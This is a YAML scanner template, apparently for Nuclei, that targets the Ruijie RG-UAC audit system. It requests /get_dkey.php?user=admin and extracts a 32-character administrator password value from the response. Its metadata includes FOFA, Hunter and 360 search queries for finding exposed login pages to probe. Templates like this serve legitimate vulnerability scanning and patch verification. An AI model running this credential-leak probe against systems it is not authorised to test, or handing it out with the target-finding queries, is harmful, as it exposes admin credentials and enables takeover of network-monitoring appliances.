http:
    - attack: batteringram
      matchers:
        - name: infoleak
          part: body
          regex:
            - password":"(\w{32})","lastpwdtime"
          type: regex
        - status:
            - 200
          type: status
      matchers-condition: and
      method: GET
      path:
        - '{{RootURL}}{{path}}'
      payloads:
        path:
            - /
            - /get_dkey.php?user=admin
      stop-at-first-match: true
id: ruijie-rg-uac-infoleak
info:
    author: xiuxin
    description: 锐捷RG-UAC统一上网行为管理与审计系统管理员密码泄露。
    metadata:
        360-qeury: title:"RG-UAC登录页面" && body:"admin"
        fofa-qeury: title="RG-UAC登录页面" && body="admin"
        hunter-qeury: web.title:"RG-UAC登录页面" && webb.body:"admin"
        max-request: 1
        veified: true
    name: 锐捷RG-UAC统一上网行为管理与审计系统管理员密码泄露
    severity: high
    tags:
        - ruijie
        - infoleak
        - RG-UAC
        - Ruijie-RG-UAC
